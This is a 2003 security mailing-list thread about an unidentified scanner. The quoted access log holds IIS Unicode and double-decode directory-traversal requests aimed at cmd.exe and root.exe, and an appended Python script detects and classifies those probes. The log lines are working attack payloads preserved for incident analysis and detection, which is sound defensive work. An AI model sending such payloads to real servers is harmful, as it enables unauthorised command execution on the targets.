I know what the exploits are :) I was curious if anyone had seen the same combination of scans and/or knew which tool generated them. I would assume it is a newish tool because I've not been able to find the pattern in my logs going back 6-8 months.

On Tuesday, July 29, 2003, at 12:42 PM, James Williams wrote:

> Looks like old Unicode exploits. Those scanners are all over the place.
> You could probably go to packetstormsecurity.nl and search for "Unicode"
> and find one.
>
> James Williams
> Network Systems Engineer
> West Texas A&M University
> http://www.wtamu.edu
> Phone: 806-651-2162
> Email: jwilliamsat_private
>
> -----Original Message-----
> From: Danny [mailto:dannyat_private]
> Sent: Monday, July 28, 2003 10:24 PM
> To: incidentsat_private
> Subject: Anyone know this tool?
>
> Does anyone happen to know what tool this is? I've seen the exact same
> scans on 6 of our servers on completely different networks. All the
> scans have been from different source IPs and all the servers were hit
> within a space of a few hours.
>
> Curiosity is getting the better of me since I've never seen this exact
> pattern before :)
>
> 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
> 64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
>
> Danny
> Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
> Play - http://www.eBoundary.net - Who really sets your electronic boundaries?
> AIM: eBoundaryTch | ICQ: 3090141

Danny
Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
Play - http://www.eBoundary.net - Who really sets your electronic boundaries?
AIM: eBoundaryTch | ICQ: 3090141
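As an added defender-side example, not code from the thread or from either poster, here is a small Python log checker for the probe pattern in Danny's log: it decodes the overlong-UTF-8 and double-encoded traversal sequences the way an unpatched IIS did, tags each request with the probe type, and returns the hits so a burst from one source can be counted. The sample log lines, the regex and the tag names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample modelled on the scan in the thread (not the original log).
SAMPLE_LOG = """\
64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
10.0.0.5 - - [28/Jul/2003:22:19:00 -0500] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
"""

# Common log format prefix: ip ident user [timestamp] "method path proto" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')

# Overlong/alternate UTF-8 sequences that unpatched IIS 4/5 turned into a path
# separator only after its traversal check had run (the MS00-078 "Unicode" bug).
OVERLONG = {"%c0%af": "/", "%c0%2f": "/", "%c1%1c": "\\", "%c1%9c": "\\"}

def canonicalize(path: str) -> str:
    """Decode like a lax server: map overlong sequences to slashes, percent-decode twice
    (the second pass turns %255c into '\\', the MS01-026 double-decode bug), normalise '\\'."""
    p = path.split("?", 1)[0].lower()
    for enc, sep in OVERLONG.items():
        p = p.replace(enc, sep)
    return unquote(unquote(p)).replace("\\", "/")

def classify(path: str) -> list:
    """Tag one request path with the probe types seen in the thread's log."""
    raw, canon, tags = path.lower(), canonicalize(path), []
    if "root.exe" in raw:            # cmd.exe copy left behind by earlier worm infections
        tags.append("root.exe backdoor probe")
    if any(enc in raw for enc in OVERLONG):
        tags.append("overlong-utf8 traversal")
    if "%25" in raw or "%%" in raw:  # the '%' itself encoded, or malformed (Apache answers 400)
        tags.append("double-decode traversal")
    if canon.endswith("cmd.exe"):
        tags.append("cmd.exe invocation" + (" via ../" if "../" in canon else ""))
    return tags

def scan_log(text: str) -> list:
    """One dict per suspicious request; a burst from one IP within seconds is the scanner signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (tags := classify(m["path"])):
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]), "path": m["path"],
                         "canonical": canonicalize(m["path"]), "tags": tags})
    return hits
```

Feeding a real access log through `scan_log` and counting hits per `ip` (for instance with `collections.Counter`) shows the same 16-request burst from a single source that Danny's servers recorded.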
This archive was generated by hypermail 2b30 : Tue Jul 29 2003 - 13:43:14 PDT